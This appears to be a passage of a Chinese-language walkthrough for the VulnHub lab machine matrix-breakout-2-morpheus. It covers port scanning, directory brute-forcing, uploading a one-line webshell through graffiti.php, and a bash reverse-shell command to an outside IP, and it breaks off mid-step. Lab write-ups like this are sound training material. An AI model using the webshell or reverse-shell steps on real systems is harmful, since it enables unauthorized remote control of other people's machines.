matrix-breakout-2-morpheus靶场通过

1、安装靶场

下载虚拟机（https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova）。

2、主机ip和端口

用nmap扫描一下ip和端口，主机ip是192.168.13.1，那我们靶场的ip就是192.168.13.144，并且22，80，81端口是开发的。

依次访问端口，发现81端口弹出一个登录框。

3、目录扫描

dirsearch -u 192.168.13.144  //在kali里用

可以发现有一个robots.txt。访问robots.txt，提示我们继续找找。可能是因为我们的字典太小了，我们找找有没有更大的字典。

gobuster dir -u http://192.168.13.144/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

通过gobuster扫描了一个几十万的字典，我们可以看到有一个graffiti.php，尝试访问。

4、抓包

随便输入一个数据，我们可以发现数据被传输到了graffiti.txt。

5、Getshell

抓包写一句话木马进去，用工具连接木马。

6、反弹shell

bash -i >& /dev/tcp/47.93.51.60/8888 0>&1

在目录里新建一个shell.sh，里面写我们的反弹shell，然后